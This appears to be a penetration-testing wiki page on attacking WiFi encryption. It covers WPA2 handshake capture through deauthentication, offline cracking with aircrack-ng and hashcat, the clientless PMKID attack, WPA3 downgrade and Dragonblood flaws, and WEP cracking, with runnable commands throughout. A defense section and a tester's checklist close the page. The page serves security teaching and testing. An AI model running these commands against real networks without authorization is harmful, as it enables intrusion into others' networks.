WPA/WPA2/WPA3 Attacks
WPA2-PSK (pre-shared key) is the most common WiFi encryption in homes and SMBs. Its security depends entirely on the password’s strength: the attack is to capture the “handshake” (the encrypted greeting between client and AP on connecting) and then crack it offline by trying passwords. If the key is weak, it falls; if it’s long and random, it’s infeasible. WPA3 improves this with SAE, but still has vectors.
sequenceDiagram
participant C as Client
participant AP as Access point
participant A as Attacker
A->>C: deauth (forces a reconnect)
C->>AP: 4-way handshake (on reconnect)
A->>A: capture the handshake and crack it offline (hashcat -m 22000)
WPA2-PSK: capture the handshake
Section titled “WPA2-PSK: capture the handshake”The 4-way handshake is exchanged when a client connects. You must capture it:
# 1) put the card in monitor mode and focus the target APairmon-ng start wlan0airodump-ng -c <channel> --bssid <AP> -w capture wlan0mon# 2) force a handshake by disconnecting a client (deauth)aireplay-ng --deauth 5 -a <AP> -c <client> wlan0mon# 3) airodump shows "WPA handshake: <AP>" when it captures itWPA2: crack offline
Section titled “WPA2: crack offline”With the handshake in the .cap, you try passwords offline:
# aircrack-ng with a dictionaryaircrack-ng -w rockyou.txt -b <AP> capture.cap# hashcat (faster with GPU): convert the cap to format 22000hcxpcapngtool -o hash.22000 capture.pcapnghashcat -m 22000 hash.22000 rockyou.txt# with rules / masks for patterned passwordshashcat -m 22000 hash.22000 -a 3 ?u?l?l?l?l?d?d?d?dThe whole attack is offline: the key’s strength decides everything.
PMKID attack (clientless)
Section titled “PMKID attack (clientless)”There aren’t always connected clients to deauth. The PMKID attack obtains crackable material directly from the AP, with no client or full handshake needed (if the AP allows it):
hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1# extract the PMKID and crack it like the handshakehcxpcapngtool -o hash.22000 dump.pcapnghashcat -m 22000 hash.22000 rockyou.txtWPA3 (SAE) and downgrade
Section titled “WPA3 (SAE) and downgrade”WPA3 replaces the handshake with SAE (Dragonfly), resistant to offline cracking. But:
# WPA2/WPA3 transition mode: an AP supporting both allows forcing WPA2 (downgrade)# -> attack as WPA2# Dragonblood (CVE-2019-9494/9496): flaws in early SAE implementations# (side-channels, downgrade) -> some crackable# in practice, well-implemented WPA3-only resists the offline attackWPA-Enterprise (802.1X)
Section titled “WPA-Enterprise (802.1X)”On Enterprise networks there’s no PSK; clients authenticate against a RADIUS. The typical attack is an evil twin with a fake RADIUS that captures credentials (challenge/response, crackable) — covered in wifi-eviltwin.
WEP (historical)
Section titled “WEP (historical)”# WEP is trivial: capture enough IVs and crackaircrack-ng capture.cap # with enough packets, the key falls in minutes# still appears on very old devices -> critical finding if presentFor the defense
Section titled “For the defense”- Long, random password (a 15+ character phrase) — it’s the only thing that stops offline cracking in WPA2.
- Well-implemented WPA3-only (no transition mode if possible); patch firmware (Dragonblood).
- Disable WPS (makes getting the key without cracking easier, see WPS Attacks) and WEP.
- Enterprise (802.1X) with EAP-TLS (certificates) instead of PSK; validate the server certificate on clients.
- 802.11w (PMF) to mitigate the deauth that forces the handshake; monitor mass deauth.
Testing checklist
Section titled “Testing checklist”- Capture the WPA2 handshake (airodump + deauth)
- Crack offline (aircrack/hashcat -m 22000)
- PMKID attack if no clients (hcxdumptool)
- WPA3: transition mode? → downgrade to WPA2
- Dragonblood on old SAE implementations
- WEP if present (trivial crack)
- Enterprise: evil twin RADIUS (Evil Twin and Captive Portals)
- Assess the key’s strength (real impact)